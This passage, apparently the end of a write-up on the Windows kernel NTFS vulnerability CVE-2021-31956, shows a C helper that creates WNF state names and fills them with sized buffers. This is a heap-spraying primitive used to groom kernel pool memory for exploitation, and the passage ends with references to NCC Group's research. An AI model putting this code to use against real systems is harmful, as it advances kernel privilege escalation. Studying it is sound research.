    InitializeSecurityDescriptor(SecurityDescriptor, SECURITY_DESCRIPTOR_REVISION);
    SetSecurityDescriptorOwner(SecurityDescriptor, pOwner, OwnerDefault);
    SetSecurityDescriptorGroup(SecurityDescriptor, pGroup, GroupDefault);
    SetSecurityDescriptorDacl(SecurityDescriptor, DaclPresent, pDacl, DaclDefault);
    SetSecurityDescriptorSacl(SecurityDescriptor, SaclPresent, pSacl, SaclDefault);

    HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, GetSD);

    Status = fNtCreateWnfStateName(
        pStateName,
        WnfTemporaryStateName,      
        WnfDataScopeSession,    
        FALSE,
        &TypeID,
        0x1000,
        SecurityDescriptor);  // invoke WNF API with new SD

    if (Status < 0)
    {
        return FALSE;
    }

    PVOID lpBuff = (PVOID)malloc(dwWantedSize - 0x20);
    memset(lpBuff, 0x00, dwWantedSize - 0x20);

    Status = fNtUpdateWnfStateData(
        pStateName,
        lpBuff,
        dwWantedSize - 0x20,
        &TypeID,
        NULL,
        0,
        0);

    if (Status < 0)
    {
        return FALSE;
    }
    free(lpBuff);
    return TRUE;
}

References

https://research.nccgroup.com/2021/07/15/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/

https://research.nccgroup.com/2021/08/17/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-2/